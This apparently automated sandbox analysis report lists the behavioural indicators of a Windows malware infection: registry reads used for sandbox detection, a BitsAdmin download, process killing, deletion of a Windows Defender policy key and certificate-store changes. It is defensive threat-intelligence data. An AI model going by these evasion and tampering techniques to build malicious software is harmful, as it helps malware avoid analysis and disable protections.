pid pid_target Process procid_target 1796 4044 WerFault.exe 123 1108 4188 WerFault.exe 124 5828 4188 WerFault.exe 124 4156 4188 WerFault.exe 124 5856 4188 WerFault.exe 124 5804 4188 WerFault.exe 124 304 4188 WerFault.exe 124 4868 4188 WerFault.exe 124 5188 4188 WerFault.exe 124 5400 4188 WerFault.exe 124 3032 4360 WerFault.exe 122 5616 4368 WerFault.exe 201 356 4160 WerFault.exe 279 1724 3572 WerFault.exe 307 6888 5136 WerFault.exe 317 -
Checks SCSI registry key(s) 3 TTPs 33 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI crhurww Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jwhurww Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jwhurww Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jwhurww Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jwhurww Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jwhurww Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI dshurww Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jwhurww Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jwhurww Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI arnatic_2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI chrome.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jwhurww Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 912A.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI dshurww Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI dshurww Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI dshurww Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI crhurww Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI dshurww Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI arnatic_2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jwhurww Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI crhurww Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI crhurww Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI arnatic_2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 912A.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI crhurww Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI chrome.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI chrome.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 912A.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI dshurww Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI crhurww -
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString KJ8KOGKTrbSPADmv6gtY6AMA.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 F9DD.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 LabPicV3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 1C3E.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString LabPicV3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 KJ8KOGKTrbSPADmv6gtY6AMA.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 c7Hb6tzXOIGRFte2abYPnnBY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString c7Hb6tzXOIGRFte2abYPnnBY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString F9DD.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 1C3E.exe -
Delays execution with timeout.exe 6 IoCs
pid Process 4420 timeout.exe 5584 timeout.exe 5764 timeout.exe 1504 timeout.exe 2892 timeout.exe 5288 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 1924 bitsadmin.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Kills process with taskkill 8 IoCs
pid Process 4444 taskkill.exe 5152 taskkill.exe 2312 taskkill.exe 4496 taskkill.exe 4320 taskkill.exe 5856 taskkill.exe 4668 taskkill.exe 4164 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 1631.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" icacls.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" icacls.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed icacls.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs icacls.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople 3DC3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" icacls.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates 3DC3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs 3DC3.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D457F22C-1573-4A6F-97B4-209BE5A67545}Machine\SOFTWARE\Policies\Microsoft\Windows Defender rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" icacls.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 1631.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs 1631.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs 3DC3.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" icacls.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D457F22C-1573-4A6F-97B4-209BE5A67545}Machine\SOFTWARE\Policies rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 1631.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs 1631.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" icacls.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs 3DC3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" icacls.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA 1631.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" icacls.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" icacls.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates 3DC3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs icacls.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "332377071" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/ MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates\4EEF7FAF0062D34ABEE MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 1ff34d169172d701 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{TV2553ZI-PZ3Y-VP7M-68Y0-MJT9X67Z6U7M} rUNdlL32.eXe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\propapps.info\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0b6772eb8f72d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Next Rating Prompt = 00729a956196d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileNextUpdateDate = "331756400" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\allhugenewz.com\NumberOfSub = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\allhugenewz.com\Total = "179" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\MrtCache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QJ2559JN-BF7A-LM2A-20M4-JBF9M43Q7G3S} svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local 